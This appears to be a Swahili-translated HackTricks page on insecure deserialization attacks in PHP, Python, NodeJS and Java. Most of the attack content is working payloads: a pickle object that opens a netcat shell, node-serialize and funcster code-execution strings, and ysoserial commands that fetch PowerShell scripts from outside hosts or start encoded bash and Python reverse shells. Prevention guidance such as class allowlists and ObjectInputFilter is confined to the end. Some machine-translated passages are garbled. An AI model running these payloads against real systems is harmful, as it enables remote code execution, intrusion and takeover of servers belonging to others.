HackTricksDeserialization
Reading time: 35 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Basic Information
Serialization inamaanisha njia ya kubadilisha kitu kuwa muundo ambao unaweza kuhifadhiwa, kwa nia ya ama kuhifadhi kitu hicho au kukituma kama sehemu ya mchakato wa mawasiliano. Mbinu hii hutumiwa mara nyingi kuhakikisha kwamba kitu hicho kinaweza kuundwa tena baadaye, ikihifadhi muundo na hali yake.
Deserialization, kinyume chake, ni mchakato unaopinga serialization. Inahusisha kuchukua data ambayo imeundwa kwa muundo maalum na kuijenga tena kuwa kitu.
Deserialization inaweza kuwa hatari kwa sababu inaweza kuruhusu washambuliaji kubadilisha data iliyosajiliwa ili kutekeleza msimbo mbaya au kusababisha tabia isiyotarajiwa katika programu wakati wa mchakato wa ujenzi wa kitu.
PHP
Katika PHP, mbinu maalum za kichawi hutumiwa wakati wa mchakato wa serialization na deserialization:
__sleep: Inaitwa wakati kitu kinaposajiliwa. Mbinu hii inapaswa kurudisha orodha ya majina ya mali zote za kitu ambazo zinapaswa kusajiliwa. Inatumika mara nyingi kuhifadhi data inayosubiri au kufanya kazi za usafi zinazofanana.__wakeup: Inaitwa wakati kitu kinaposajiliwa tena. Inatumika kurejesha uhusiano wowote wa database ambao unaweza kuwa umepotea wakati wa serialization na kufanya kazi nyingine za kuanzisha tena.__unserialize: Mbinu hii inaitwa badala ya__wakeup(ikiwa inapatikana) wakati kitu kinaposajiliwa tena. Inatoa udhibiti zaidi juu ya mchakato wa deserialization ikilinganishwa na__wakeup.__destruct: Mbinu hii inaitwa wakati kitu kinakaribia kuharibiwa au wakati script inamalizika. Inatumika kawaida kwa kazi za usafi, kama kufunga mikono ya faili au uhusiano wa database.__toString: Mbinu hii inaruhusu kitu kutendewa kama string. Inaweza kutumika kwa kusoma faili au kazi nyingine kulingana na wito wa kazi ndani yake, ikitoa kwa ufanisi uwakilishi wa maandiko wa kitu.
<?php
class test {
public $s = "This is a test";
public function displaystring(){
echo $this->s.'<br />';
}
public function __toString()
{
echo '__toString method called';
}
public function __construct(){
echo "__construct method called";
}
public function __destruct(){
echo "__destruct method called";
}
public function __wakeup(){
echo "__wakeup method called";
}
public function __sleep(){
echo "__sleep method called";
return array("s"); #The "s" makes references to the public attribute
}
}
$o = new test();
$o->displaystring();
$ser=serialize($o);
echo $ser;
$unser=unserialize($ser);
$unser->displaystring();
/*
php > $o = new test();
__construct method called
__destruct method called
php > $o->displaystring();
This is a test<br />
php > $ser=serialize($o);
__sleep method called
php > echo $ser;
O:4:"test":1:{s:1:"s";s:14:"This is a test";}
php > $unser=unserialize($ser);
__wakeup method called
__destruct method called
php > $unser->displaystring();
This is a test<br />
*/
?>
Ikiwa utaangalia matokeo utaona kwamba kazi __wakeup na __destruct zinaitwa wakati kitu kinapokuwa deserialized. Kumbuka kwamba katika mafunzo kadhaa utaona kwamba kazi __toString inaitwa unapojaribu kuchapisha sifa fulani, lakini kwa wazi hiyo haifanyiki tena.
warning
Njia __unserialize(array $data) inaitwa badala ya __wakeup() ikiwa imeanzishwa katika darasa. Inakuruhusu kuunserialize kitu kwa kutoa data iliyosajiliwa kama array. Unaweza kutumia njia hii kuunserialize mali na kufanya kazi zozote muhimu wakati wa deserialization.
class MyClass {
private $property;
public function __unserialize(array $data): void {
$this->property = $data['property'];
// Fanya kazi zozote muhimu wakati wa deserialization.
}
}
Unaweza kusoma mfano wa PHP ulioelezewa hapa: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/, hapa https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf au hapa https://securitycafe.ro/2015/01/05/understanding-php-object-injection/
PHP Deserial + Autoload Classes
Unaweza kutumia vibaya kazi ya autoload ya PHP ili kupakia faili za php zisizo na mpangilio na zaidi:
{{#ref}} php-deserialization-+-autoload-classes.md {{#endref}}
Kuweka Thamani za Marejeleo
Ikiwa kwa sababu fulani unataka kuweka thamani kama marejeleo kwa thamani nyingine iliyosajiliwa unaweza:
<?php
class AClass {
public $param1;
public $param2;
}
$o = new WeirdGreeting;
$o->param1 =& $o->param22;
$o->param = "PARAM";
$ser=serialize($o);
PHPGGC (ysoserial kwa PHP)
PHPGGC inaweza kusaidia katika kuunda payloads za kutumia PHP deserializations.
Kumbuka kwamba katika kesi nyingi huwezi kupata njia ya kutumia deserialization katika msimbo wa chanzo wa programu lakini unaweza kuwa na uwezo wa kutumia msimbo wa nyongeza za PHP za nje.
Hivyo, ikiwa unaweza, angalia phpinfo() ya seva na tafuta mtandaoni (hata kwenye gadgets za PHPGGC) baadhi ya gadgets zinazoweza kutumiwa.
phar:// metadata deserialization
Ikiwa umepata LFI inayosoma tu faili na sio kutekeleza msimbo wa php ndani yake, kwa mfano kwa kutumia kazi kama file_get_contents(), fopen(), file() au file_exists(), md5_file(), filemtime() au filesize(). Unaweza kujaribu kutumia deserialization inayotokea wakati wa kusoma faili kwa kutumia itifaki ya phar.
Kwa maelezo zaidi soma chapisho lifuatalo:
{{#ref}} ../file-inclusion/phar-deserialization.md {{#endref}}
Python
Pickle
Wakati kitu kinapokewa, kazi ___reduce___ itatekelezwa.
Wakati inatumika, seva inaweza kurudisha kosa.
import pickle, os, base64
class P(object):
def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P())))
Kabla ya kuangalia mbinu ya kupita, jaribu kutumia print(base64.b64encode(pickle.dumps(P(),2))) ili kuunda kitu ambacho kinapatana na python2 ikiwa unatumia python3.
Kwa maelezo zaidi kuhusu kutoroka kutoka pickle jails angalia:
{{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}}
Yaml & jsonpickle
Ukurasa ufuatao un presenting mbinu ya kudhulumu deserialization isiyo salama katika maktaba za yamls za python na kumaliza na chombo ambacho kinaweza kutumika kuunda payload ya RCE deserialization kwa Pickle, PyYAML, jsonpickle na ruamel.yaml:
{{#ref}} python-yaml-deserialization.md {{#endref}}
Class Pollution (Python Prototype Pollution)
{{#ref}} ../../generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md {{#endref}}
NodeJS
JS Magic Functions
JS haina "magic" functions kama PHP au Python ambazo zitatekelezwa tu kwa ajili ya kuunda kitu. Lakini ina functions ambazo zinatumika mara kwa mara hata bila kuziita moja kwa moja kama toString, valueOf, toJSON.
Ikiwa unatumia deserialization unaweza kuathiri hizi functions ili kutekeleza code nyingine (kwa kuweza kudhulumu prototype pollutions) unaweza kutekeleza code isiyo na mipaka wakati zinapoitwa.
Njia nyingine "magic" ya kuita function bila kuikalia moja kwa moja ni kwa kuathiri kitu ambacho kinarejeshwa na function ya async (ahadi). Kwa sababu, ikiwa unabadilisha hiyo kitu kinachorejeshwa kuwa ahadi nyingine yenye sifa inayoitwa "then" ya aina function, itatekelezwa **tu kwa sababu inarejeshwa na ahadi nyingine. Fuata kiungo hiki kwa maelezo zaidi.
// If you can compromise p (returned object) to be a promise
// it will be executed just because it's the return object of an async function:
async function test_resolve() {
const p = new Promise((resolve) => {
console.log("hello")
resolve()
})
return p
}
async function test_then() {
const p = new Promise((then) => {
console.log("hello")
return 1
})
return p
}
test_ressolve()
test_then()
//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/
__proto__ na uchafuzi wa prototype
Ikiwa unataka kujifunza kuhusu mbinu hii angalia tutorial ifuatayo:
{{#ref}} nodejs-proto-prototype-pollution/ {{#endref}}
node-serialize
Maktaba hii inaruhusu kusawazisha kazi. Mfano:
var y = {
rce: function () {
require("child_process").exec("ls /", function (error, stdout, stderr) {
console.log(stdout)
})
},
}
var serialize = require("node-serialize")
var payload_serialized = serialize.serialize(y)
console.log("Serialized: \n" + payload_serialized)
kipande kilichopangwa kitaonekana kama:
{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
Unaweza kuona katika mfano kwamba wakati kazi inas_serialized, bendera _$$ND_FUNC$$_ inaongezwa kwenye kitu kilichos_serialized.
Ndani ya faili node-serialize/lib/serialize.js unaweza kupata bendera hiyo hiyo na jinsi msimbo unavyotumia hiyo.
.png)
.png)
Kama unavyoona katika kipande cha mwisho cha msimbo, ikiwa bendera imepatikana eval inatumika kus_serialized kazi, hivyo kimsingi ingizo la mtumiaji linatumika ndani ya kazi ya eval.
Hata hivyo, kuhifadhi tu kazi hakutatekeleza kwani itahitajika sehemu fulani ya msimbo kuitisha y.rce katika mfano wetu na hiyo ni ngumu.
Hata hivyo, unaweza tu kubadilisha kitu kilichos_serialized kwa kuongeza mabano ili kutekeleza kiotomatiki kazi iliyos_serialized wakati kitu kinapos_serialized.
Katika kipande kijacho cha msimbo angalia mabano ya mwisho na jinsi kazi ya unserialize itatekeleza kiotomatiki msimbo:
var serialize = require("node-serialize")
var test = {
rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()",
}
serialize.unserialize(test)
Kama ilivyosemwa awali, maktaba hii itapata msimbo baada ya _$$ND_FUNC$$_ na itau tekeleza kwa kutumia eval. Hivyo, ili kuji-tekeleza kwa msimbo unaweza kufuta sehemu ya uundaji wa kazi na paranthesi ya mwisho na ku-tekeleza tu JS oneliner kama katika mfano ufuatao:
var serialize = require("node-serialize")
var test =
"{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
serialize.unserialize(test)
Unaweza kupata hapa taarifa zaidi kuhusu jinsi ya kutumia udhaifu huu.
funcster
Jambo muhimu kuhusu funcster ni ukosefu wa upatikanaji wa vitu vya ndani vilivyojengwa; vinatoka nje ya upeo unaopatikana. Kikomo hiki kinazuia utekelezaji wa msimbo unaojaribu kuita mbinu kwenye vitu vya ndani, na kusababisha makosa kama "ReferenceError: console is not defined" wakati amri kama console.log() au require(something) zinapotumika.
Licha ya kikomo hiki, urejeleaji wa upatikanaji kamili wa muktadha wa kimataifa, ikiwa ni pamoja na vitu vyote vya ndani vilivyojengwa, inawezekana kupitia njia maalum. Kwa kutumia muktadha wa kimataifa moja kwa moja, mtu anaweza kupita kikomo hiki. Kwa mfano, upatikanaji unaweza kurejelewa kwa kutumia kipande kifuatacho:
funcster = require("funcster")
//Serialization
var test = funcster.serialize(function () {
return "Hello world!"
})
console.log(test) // { __js_function: 'function(){return"Hello world!"}' }
//Deserialization with auto-execution
var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
funcster.deepDeserialize(desertest1)
var desertest2 = {
__js_function: 'this.constructor.constructor("console.log(1111)")()',
}
funcster.deepDeserialize(desertest2)
var desertest3 = {
__js_function:
"this.constructor.constructor(\"require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\")()",
}
funcster.deepDeserialize(desertest3)
Kwa maelezo zaidi soma chanzo hiki.
serialize-javascript
Kifurushi cha serialize-javascript kimeundwa mahsusi kwa ajili ya kusawazisha, hakina uwezo wowote wa kujisawazisha. Watumiaji wanawajibika kutekeleza njia zao za kujisawazisha. Matumizi ya moja kwa moja ya eval yanapendekezwa na mfano rasmi wa kujisawazisha data iliyosawazishwa:
function deserialize(serializedJavascript) {
return eval("(" + serializedJavascript + ")")
}
Ikiwa kazi hii inatumika ku-deserialize vitu unaweza kuiharibu kwa urahisi:
var serialize = require("serialize-javascript")
//Serialization
var test = serialize(function () {
return "Hello world!"
})
console.log(test) //function() { return "Hello world!" }
//Deserialization
var test =
"function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
deserialize(test)
Kwa maelezo zaidi soma chanzo hiki.
Maktaba ya Cryo
Katika kurasa zinazofuata unaweza kupata maelezo kuhusu jinsi ya kutumia vibaya maktaba hii ili kutekeleza amri zisizo na mipaka:
- https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
- https://hackerone.com/reports/350418
Java - HTTP
Katika Java, kurejesha maoni ya deserialization hufanyika wakati wa mchakato wa deserialization. Utendaji huu unaweza kutumiwa na washambuliaji wanaounda payload hatari zinazochochea maoni haya, na kusababisha utekelezaji wa vitendo vya hatari.
Alama za Kidole
Sanduku la Nyeupe
Ili kubaini uwezekano wa udhaifu wa serialization katika msimbo, tafuta:
- Madarasa yanayotekeleza interface ya
Serializable. - Matumizi ya
java.io.ObjectInputStream,readObject,readUnsharekazi.
Zingatia kwa makini:
XMLDecoderinayotumika na vigezo vilivyofafanuliwa na watumiaji wa nje.- Njia ya
fromXMLyaXStream, hasa ikiwa toleo la XStream ni sawa na au chini ya 1.46, kwani linaweza kuathirika na masuala ya serialization. ObjectInputStreamiliyoambatanishwa na njia yareadObject.- Utekelezaji wa njia kama
readObject,readObjectNodData,readResolve, aureadExternal. ObjectInputStream.readUnshared.- Matumizi ya jumla ya
Serializable.
Sanduku la Nyeusi
Kwa upimaji wa sanduku la nyeusi, tafuta sahihi maalum au "Magic Bytes" zinazotambulisha vitu vilivyopangwa vya java (vinavyotokana na ObjectInputStream):
- Mchoro wa hexadecimal:
AC ED 00 05. - Mchoro wa Base64:
rO0. - Vichwa vya majibu ya HTTP vilivyowekwa
Content-typekuwaapplication/x-java-serialized-object. - Mchoro wa hexadecimal unaoashiria kufungwa kwa awali:
1F 8B 08 00. - Mchoro wa Base64 unaoashiria kufungwa kwa awali:
H4sIA. - Faili za wavuti zenye kiambishi cha
.facesna parameter yafaces.ViewState. Kugundua mifumo hii katika programu ya wavuti inapaswa kusababisha uchunguzi kama ilivyoelezwa katika post kuhusu Java JSF ViewState Deserialization.
javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s
Angalia kama kuna udhaifu
Ikiwa unataka kujifunza jinsi unavyofanya kazi kwa Java Deserialized exploit unapaswa kuangalia Msingi wa Java Deserialization, Java DNS Deserialization, na CommonsCollection1 Payload.
Mtihani wa Sanduku Nyeupe
Unaweza kuangalia kama kuna programu yoyote iliyosakinishwa yenye udhaifu unaojulikana.
find . -iname "*commons*collection*"
grep -R InvokeTransformer .
Unaweza kujaribu kuangalia maktaba zote zinazojulikana kuwa na udhaifu na ambazo Ysoserial inaweza kutoa exploit kwa ajili yake. Au unaweza kuangalia maktaba zilizoonyeshwa kwenye Java-Deserialization-Cheat-Sheet.
Pia unaweza kutumia gadgetinspector kutafuta mnyororo wa gadget unaoweza kutumika.
Unapokimbia gadgetinspector (baada ya kuijenga) usijali kuhusu maonyo/makosa mengi ambayo inapitia na uache ikamilike. Itandika matokeo yote chini ya gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt. Tafadhali, fahamu kwamba gadgetinspector haitaunda exploit na inaweza kuonyesha matokeo yasiyo sahihi.
Black Box Test
Kwa kutumia nyongeza ya Burp gadgetprobe unaweza kubaini ni maktaba zipi zinapatikana (hata toleo zake). Kwa habari hii inaweza kuwa rahisi kuchagua payload ya kutumia exploit udhaifu.
Soma hii kujifunza zaidi kuhusu GadgetProbe.
GadgetProbe inazingatia ObjectInputStream deserializations.
Kwa kutumia nyongeza ya Burp Java Deserialization Scanner unaweza kubaini maktaba zenye udhaifu zinazoweza kutumika na ysoserial na kuzi exploit.
Soma hii kujifunza zaidi kuhusu Java Deserialization Scanner.
Java Deserialization Scanner inazingatia ObjectInputStream deserializations.
Pia unaweza kutumia Freddy kubaini udhaifu wa deserialization katika Burp. Plugin hii itagundua si tu udhaifu wa ObjectInputStream bali pia udhaifu kutoka Json na Yml deserialization maktaba. Katika hali ya kazi, itajaribu kuthibitisha kwa kutumia payload za usingizi au DNS.
Unaweza kupata maelezo zaidi kuhusu Freddy hapa.
Serialization Test
Sio kila kitu ni kuhusu kuangalia kama maktaba yoyote yenye udhaifu inatumika na seva. Wakati mwingine unaweza kuwa na uwezo wa kubadilisha data ndani ya kitu kilichosajiliwa na kupita baadhi ya ukaguzi (labda kukupa ruhusa za admin ndani ya webapp).
Ikiwa unapata kitu kilichosajiliwa cha java kinachotumwa kwa programu ya wavuti, unaweza kutumia SerializationDumper kuchapisha kwa muundo unaoweza kusomeka na binadamu kitu cha usajili kinachotumwa. Kujua ni data gani unayotuma itakuwa rahisi kuibadilisha na kupita baadhi ya ukaguzi.
Exploit
ysoserial
Chombo kikuu cha kutumia exploit Java deserializations ni ysoserial (pakua hapa). Unaweza pia kuzingatia kutumia ysoseral-modified ambayo itakuruhusu kutumia amri ngumu (kwa mfano na pipes).
Fahamu kwamba chombo hiki kina zingatia kutumia ObjectInputStream.
Ningekuwa naanza kutumia payload ya "URLDNS" kabla ya payload ya RCE ili kujaribu kama sindano inawezekana. Hata hivyo, fahamu kwamba labda payload ya "URLDNS" haitafanya kazi lakini payload nyingine ya RCE inafanya kazi.
# PoC to make the application perform a DNS req
java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
# PoC RCE in Windows
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload
# Time, I noticed the response too longer when this was used
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload
# Create File
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')
## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0
# Reverse Shell
## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"
#PoC RCE in Linux
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload
# Time
## Using time in bash I didn't notice any difference in the timing of the response
# Create file
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# Reverse shell
## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0
## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"
# Base64 encode payload in base64
base64 -w0 payload
Wakati wa kuunda payload kwa java.lang.Runtime.exec() hu wezi kutumia herufi maalum kama ">" au "|" kuhamasisha matokeo ya utekelezaji, "$()" kutekeleza amri au hata kupitisha hoja kwa amri zilizotenganishwa na nafasi (unaweza kufanya echo -n "hello world" lakini huwezi kufanya python2 -c 'print "Hello world"'). Ili kuandika payload kwa usahihi unaweza kutumia ukurasa huu.
Jihadharini kutumia skripti ifuatayo kuunda payloads zote zinazowezekana za utekelezaji wa msimbo kwa Windows na Linux kisha uzijaribu kwenye ukurasa wa wavuti ulio hatarini:
import os
import base64
# You may need to update the payloads
payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
def generate(name, cmd):
for payload in payloads:
final = cmd.replace('REPLACE', payload)
print 'Generating ' + payload + ' for ' + name + '...'
command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
result = command.read()
command.close()
encoded = base64.b64encode(result)
if encoded != "":
open(name + '_intruder.txt', 'a').write(encoded + '\n')
generate('Windows', 'ping -n 1 win.REPLACE.server.local')
generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
serialkillerbypassgadgets
Unaweza kutumia https://github.com/pwntester/SerialKillerBypassGadgetCollection pamoja na ysoserial kuunda exploit zaidi. Taarifa zaidi kuhusu chombo hiki katika slides za mazungumzo ambapo chombo kilitolewa: https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1
marshalsec
marshalsec inaweza kutumika kuunda payloads za kutumia katika maktaba tofauti za Json na Yml serialization katika Java.
Ili kuunda mradi nilihitaji kuongeza hizi dependencies kwenye pom.xml:
<dependency>
<groupId>javax.activation</groupId>
<artifactId>activation</artifactId>
<version>1.1.1</version>
</dependency>
<dependency>
<groupId>com.sun.jndi</groupId>
<artifactId>rmiregistry</artifactId>
<version>1.2.1</version>
<type>pom</type>
</dependency>
Sakinisha maven, na jenga mradi:
sudo apt-get install maven
mvn clean package -DskipTests
FastJSON
Soma zaidi kuhusu maktaba hii ya Java JSON: https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html
Labs
- Ikiwa unataka kujaribu baadhi ya payloads za ysoserial unaweza kuendesha hii webapp: https://github.com/hvqzao/java-deserialize-webapp
- https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
Kwa Nini
Java inatumia serialization nyingi kwa madhumuni mbalimbali kama:
- HTTP requests: Serialization inatumika sana katika usimamizi wa vigezo, ViewState, cookies, nk.
- RMI (Remote Method Invocation): Protokali ya Java RMI, ambayo inategemea kabisa serialization, ni msingi wa mawasiliano ya mbali katika programu za Java.
- RMI juu ya HTTP: Njia hii inatumika kawaida na programu za wavuti za mteja mzito za Java, zikitumika serialization kwa mawasiliano yote ya vitu.
- JMX (Java Management Extensions): JMX inatumia serialization kwa kutuma vitu kupitia mtandao.
- Protokali za Kijadi: Katika Java, mazoea ya kawaida yanahusisha usafirishaji wa vitu safi vya Java, ambayo itaonyeshwa katika mifano ijayo ya exploit.
Kuzuia
Vitu vya muda
Darasa linalotekeleza Serializable linaweza kutekeleza kama transient kitu chochote ndani ya darasa ambacho hakipaswi kuwa serializable. Kwa mfano:
public class myAccount implements Serializable
{
private transient double profit; // declared transient
private transient double margin; // declared transient
Epuka Serialization ya darasa ambalo linahitaji kutekeleza Serializable
Katika hali ambapo vitu fulani vinapaswa kutekeleza interface ya Serializable kutokana na mfuatano wa darasa, kuna hatari ya deserialization isiyo ya makusudi. Ili kuzuia hili, hakikisha vitu hivi havina uwezo wa deserializable kwa kufafanua njia ya final readObject() ambayo kila wakati inatupa kivunjaji, kama inavyoonyeshwa hapa chini:
private final void readObject(ObjectInputStream in) throws java.io.IOException {
throw new java.io.IOException("Cannot be deserialized");
}
Kuimarisha Usalama wa Deserialization katika Java
Kubadilisha java.io.ObjectInputStream ni njia ya vitendo ya kulinda michakato ya deserialization. Njia hii inafaa wakati:
- Msimbo wa deserialization uko chini ya udhibiti wako.
- Madarasa yanayotarajiwa kwa deserialization yanajulikana.
Pitia resolveClass() ili kupunguza deserialization kwa madarasa yaliyoruhusiwa tu. Hii inazuia deserialization ya darasa lolote isipokuwa yale yaliyoruhusiwa wazi, kama katika mfano ufuatao unaopunguza deserialization kwa darasa la Bicycle pekee:
// Code from https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
public class LookAheadObjectInputStream extends ObjectInputStream {
public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
super(inputStream);
}
/**
* Only deserialize instances of our expected Bicycle class
*/
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!desc.getName().equals(Bicycle.class.getName())) {
throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
}
return super.resolveClass(desc);
}
}
Kutumia Java Agent kwa Kuongeza Usalama inatoa suluhisho la kurudi nyuma wakati mabadiliko ya msimbo hayawezekani. Njia hii inatumika hasa kwa kuorodhesha madarasa hatari, kwa kutumia parameter ya JVM:
-javaagent:name-of-agent.jar
Inatoa njia ya kulinda deserialization kwa njia ya kidinamik, inayofaa kwa mazingira ambapo mabadiliko ya haraka ya msimbo hayawezekani.
Angalia mfano katika rO0 by Contrast Security
Kutekeleza Filters za Serialization: Java 9 ilianzisha filters za serialization kupitia ObjectInputFilter interface, ikitoa mekanizma yenye nguvu ya kuweka vigezo ambavyo vitu vilivyohifadhiwa vinapaswa kukutana navyo kabla ya deserialization. Filters hizi zinaweza kutumika kwa kiwango cha jumla au kwa kila mtiririko, zikitoa udhibiti wa kina juu ya mchakato wa deserialization.
Ili kutumia filters za serialization, unaweza kuweka filter ya jumla inayotumika kwa shughuli zote za deserialization au kuisawazisha kwa njia ya kidinamik kwa mtiririko maalum. Kwa mfano:
ObjectInputFilter filter = info -> {
if (info.depth() > MAX_DEPTH) return Status.REJECTED; // Limit object graph depth
if (info.references() > MAX_REFERENCES) return Status.REJECTED; // Limit references
if (info.serialClass() != null && !allowedClasses.contains(info.serialClass().getName())) {
return Status.REJECTED; // Restrict to allowed classes
}
return Status.ALLOWED;
};
ObjectInputFilter.Config.setSerialFilter(filter);
Kutumia Maktaba za Nje kwa Usalama Ulioimarishwa: Maktaba kama NotSoSerial, jdeserialize, na Kryo zinatoa vipengele vya juu vya kudhibiti na kufuatilia deserialization ya Java. Maktaba hizi zinaweza kutoa tabaka za ziada za usalama, kama vile kuorodhesha au kuzuia madarasa, kuchambua vitu vilivyohifadhiwa kabla ya deserialization, na kutekeleza mikakati ya kawaida ya serialization.
- NotSoSerial inakamata michakato ya deserialization ili kuzuia utekelezaji wa msimbo usioaminika.
- jdeserialize inaruhusu uchambuzi wa vitu vilivyohifadhiwa vya Java bila kuvitafsiri, kusaidia kubaini maudhui yanayoweza kuwa na madhara.
- Kryo ni mfumo mbadala wa serialization unaosisitiza kasi na ufanisi, ukitoa mikakati ya serialization inayoweza kubadilishwa ambayo inaweza kuimarisha usalama.
Marejeleo
- https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
- Mazungumzo kuhusu deserialization na ysoserial: http://frohoff.github.io/appseccali-marshalling-pickles/
